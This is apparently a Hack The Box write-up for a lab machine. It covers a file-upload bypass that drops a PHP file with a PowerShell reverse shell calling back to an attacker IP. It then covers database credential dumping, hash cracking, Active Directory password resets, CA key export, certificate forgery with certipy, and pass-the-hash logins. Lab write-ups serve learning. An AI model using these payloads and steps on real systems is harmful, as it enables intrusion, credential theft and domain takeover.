Certificate HTB Writeup

First of all we need to go to the website http://certificate.htb and register and login.

echo '10.10.11.71 certificate.htb DC01.certificate.htb' | sudo tee -a /etc/hosts

If we run gobuster we can see there's a php file called upload.php

gobuster dir -u "http://certificate.htb" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100 -x

If we go to the website it says this

So I fuzzed in burpsuite or you can even do it with wfuzz until I found valid s_id http://certificate.htb/upload.php?s_id=FUZZ

In this case I will go to the http://certificate.htb/upload.php?s_id=36

Here we have a file upload functionality

Here I crafted my malicious .zip for getting a reverse.

echo "I love Astro" > legit.pdf
zip benign.zip legit.pdf

mkdir malicious_files
cd malicious_files
nano shell.php
<?php
shell_exec("powershell -nop -w hidden -c \"\$client = New-Object System.Net.Sockets.TCPClient('YOURIP',4444); \$stream = \$client.GetStream(); [byte[]]\$bytes = 0..65535|%{0}; while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){; \$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0,\$i); \$sendback = (iex \$data 2>&1 | Out-String ); \$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> '; \$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2); \$stream.Write(\$sendbyte,0,\$sendbyte.Length); \$stream.Flush()}; \$client.Close()\"");
?>
cd ..
zip -r malicious.zip malicious_files/
cat benign.zip malicious.zip > combined.zip

Now upload the combined.zip

For trigger the php execution it will generate a link so click it, in my case is http://certificate.htb/static/uploads/6fd6ce565d8e0c484086e1debee16872/legit.pdf

Then we need to change the url like this http://certificate.htb/static/uploads/6fd6ce565d8e0c484086e1debee16872/malicious_files/shell.php

Before going we setup our listener nc -nlvp 4444 And we get a shell as xamppuser, here we need to go some directories back and read the db.php

I crafted this command for retrieve the users.

C:\xampp\mysql\bin\mysql.exe -u certificate_webapp_user -p"cert!f!c@teDBPWD" -D Certificate_WEBAPP_DB -e "SELECT * FROM users;"

This is the result. Here we need to focus on Sara.B hash, save its hash into hash.txt

And then crack it with hashcat, I used this command

hashcat -a 0 -m 3200 hash.txt /usr/share/wordlists/rockyou.txt -O

We get Sara.B and its password is Blink182.

First of all I runned bloodhound to see more about this AD.

bloodhound-python -u 'Sara.B' -p 'Blink182' -d certificate.htb -c All --zip -ns 10.10.11.71

Once in the bloodhound if we search by Sara.B and we go down we can see Transitive Object Control Here we can see the following scheme, this scheme means that Sara.B is a member of Account Operators. If we go to Account Operators Group and go to Reachable High value Targets

In this scheme we can see that this group has GenericAll to LION.SK

To abuse that we can simply run this command

net rpc password "lion.sk" "newP@ssword2022" -U "certificate.htb"/"Sara.B"%"Blink182" -S certificate.htb

Now we can login via winrm with this credentials and we are in. Flag is located in C:\Users\Lion.SK\Desktop\user.txt

For root first we need to change Ryan.K password and login via winrm.

This is the command I used:

net rpc password "Ryan.K" "newP@ssword2022" -U "certificate.htb"/"Sara.B"%"Blink182" -S certificate.htb

Once in the winrm session if the print the command whoami /priv

We can see that has SeManageVolumePrivilege for abuse that we can simply upload this .exe SeManageVolumeExploit

Download the .exe and upload it

If we execute it we can see the following Output

Running this exploit means that Ryan.K now has Full Control over C:

Following this we can simply run the following commands.

certutil -exportPFX my "Certificate-LTD-CA" C:\Users\Public\ca.pfx

Now we can download this ca.pfx to our machine.

With this ca.pfx we can forge our administrator.pfx

So I runned this command

certipy forge -ca-pfx ca.pfx \
-upn 'administrator@certificate.htb' \
-subject 'CN=Administrator,CN=Users,DC=certificate,DC=htb' \
-out forged_admin.pfx

Final step is abuse certipy auth for getting the Administrator hash.

certipy auth -pfx forged_admin.pfx \
-dc-ip 10.10.11.71 \
-username 'administrator' \
-domain 'certificate.htb'

Now we can login via evil-winrm or psexec I will show the two methods in case one fail.

evil-winrm -i 10.10.11.71 -u administrator -H'd803303515bf814ac14c5f1702abh866'

impacket-psexec 'Administrator@10.10.11.71' -hashes 'aad3b435b51404eeaad3b435b51404ee:d803303515bf814ac14c5f1702abh866'

I changed the hashes :) So I make sure everyone does this machine.

Made by Astro